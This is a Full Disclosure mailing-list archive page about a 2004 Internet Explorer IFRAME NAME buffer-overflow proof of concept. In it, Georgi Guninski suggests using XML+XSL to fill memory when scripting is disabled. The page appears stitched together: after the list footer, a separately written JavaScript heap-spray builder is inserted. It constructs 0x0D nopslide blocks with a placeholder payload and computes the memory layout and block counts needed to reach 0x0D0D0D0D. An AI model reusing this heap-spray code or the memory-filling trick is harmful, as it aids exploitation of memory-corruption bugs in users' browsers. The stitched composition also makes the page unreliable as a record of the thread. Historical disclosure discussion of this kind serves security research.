Full Disclosure mailing list archives
Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))
From: Georgi Guninski <guninski () guninski com>
Date: Tue, 9 Nov 2004 12:56:38 +0200
On Tue, Nov 02, 2004 at 01:41:43AM +0100, Berend-Jan Wever wrote:
> The JavaScript creates a large amount of heap-blocks filled with 0x0D byte nopslides followed by the shellcode. This is to make sure [0x0D0D0D0D] == 0x0D0D0D0D. It's not the most efficient thing in the world but it works like a charm for most IE bugs.
If you need a lot of memory to be filled with something and JavaScript is disabled, you can use XML + XSL, which allows replacing a short string with a larger one, minimizing the download. Here is an example:

---xsl.xsl----------
<?xml-stylesheet type="text/xsl" href="#test"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0" xmlns:d="http://msux.com/" id="test">
<d:d>
<a />
<a />
<a />
</d:d>
<xsl:output method="html"/>
<xsl:template match="xsl:stylesheet">
<xsl:for-each select="d:d/a">
Where do you want bill to go today?
</xsl:for-each>
<iframe src="about:blank" />
<script>alert("javascript");</script>
</xsl:template>
</xsl:stylesheet>
--------------------

Here "<a />" is replaced by "Where do you want bill to go today?".

--
georgi

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
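The heap-spray layout described in the quoted paragraph (0x0D nopslides followed by shellcode, repeated across many heap blocks), as an added example that is not part of the thread and not SkyLined's exploit code. The block size, the placeholder payload, the heap base used in the block-count estimate and all function names are assumptions made for illustration:

```javascript
// Added example (not from the thread, not SkyLined's exploit code):
// builds the 0x0D nopslide + shellcode heap-spray blocks the quoted text
// describes and inspects their byte layout. Block sizes, the block-count
// estimate and the placeholder payload are assumptions for illustration.

// JavaScript strings are UTF-16, stored little-endian in memory, so the
// code unit 0x0D0D occupies two bytes that are both 0x0D. A run of these
// units is therefore a run of 0x0D bytes: on x86, 0x0D is "or eax, imm32",
// which decodes identically at any alignment inside the run, so control
// landing anywhere in it slides forward to whatever follows.
const NOP_UNIT = "\u0d0d";

// Constructed stand-in for a payload: 32 bytes of 0xCC (int3), so that
// reaching it would be obvious in a debugger. It is not real shellcode.
const PLACEHOLDER_PAYLOAD = "\ucccc".repeat(16);

// One spray block: a nopslide padded so that slide + payload is exactly
// blockBytes bytes. Equal-sized blocks give the sprayed region a regular
// layout, which is what makes "[0x0D0D0D0D] == 0x0D0D0D0D" likely.
function buildSprayBlock(payload, blockBytes) {
  const payloadBytes = payload.length * 2;
  if (blockBytes % 2 !== 0) throw new RangeError("blockBytes must be even");
  if (payloadBytes > blockBytes) throw new RangeError("payload larger than block");
  const slideUnits = (blockBytes - payloadBytes) / 2;
  return NOP_UNIT.repeat(slideUnits) + payload;
}

// Repeat the block blockCount times. The 2004 JScript trick relied on each
// concatenation producing a fresh heap allocation; how a modern engine
// stores these strings is engine-specific, so this only shows the layout.
function buildSpray(payload, blockBytes, blockCount) {
  const blocks = new Array(blockCount);
  for (let i = 0; i < blockCount; i++) {
    blocks[i] = buildSprayBlock(payload, blockBytes);
  }
  return blocks;
}

// Serialise a string the way it sits in memory (UTF-16LE) so the bytes
// can be examined without relying on Node's Buffer.
function toBytes(str) {
  const out = new Uint8Array(str.length * 2);
  for (let i = 0; i < str.length; i++) {
    const c = str.charCodeAt(i);
    out[2 * i] = c & 0xff;       // low byte first
    out[2 * i + 1] = c >>> 8;    // high byte second
  }
  return out;
}

// Little-endian 32-bit read at a byte offset, as the CPU would do it.
function dwordAt(bytes, off) {
  return (bytes[off] | (bytes[off + 1] << 8) | (bytes[off + 2] << 16) | (bytes[off + 3] << 24)) >>> 0;
}

// True if every byte in [from, to) is 0x0D, i.e. the range is nopslide.
function isNopSlide(bytes, from, to) {
  for (let i = from; i < to; i++) if (bytes[i] !== 0x0d) return false;
  return true;
}

// Rough estimate of how many blocks it takes to grow the heap past the
// target address. Assumes allocations are roughly contiguous from heapBase,
// which real heaps are not; treat it as a lower bound and overshoot.
function blocksNeeded(heapBase, target, blockBytes) {
  return Math.ceil((target - heapBase) / blockBytes);
}

// Usage: a 4 KiB block; everything before the last 32 bytes is 0x0D, so a
// dword read at any offset inside the slide returns 0x0D0D0D0D.
const demoBytes = toBytes(buildSprayBlock(PLACEHOLDER_PAYLOAD, 0x1000));
console.log(demoBytes.length,
            dwordAt(demoBytes, 0x7fc).toString(16),
            isNopSlide(demoBytes, 0, 0x1000 - 32),
            blocksNeeded(0x00400000, 0x0d0d0d0d, 0x100000));
```

The XML + XSL trick in the reply above is a download-size optimisation for the same goal (filling memory with a repeated string when script is off); it is not covered by this block, which only shows the byte layout of the JavaScript spray.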
Current thread:
- MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Berend-Jan Wever (Nov 01)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) morning_wood (Nov 02)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Georgi Guninski (Nov 09)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) pachiderme pachiderme (Nov 09)
- <Possible follow-ups>
- RE: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Menashe Eliezer (Nov 07)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Berend-Jan Wever (Nov 07)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) patryn (Nov 08)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Valdis . Kletnieks (Nov 08)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Jim Geovedi (Nov 09)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Berend-Jan Wever (Nov 07)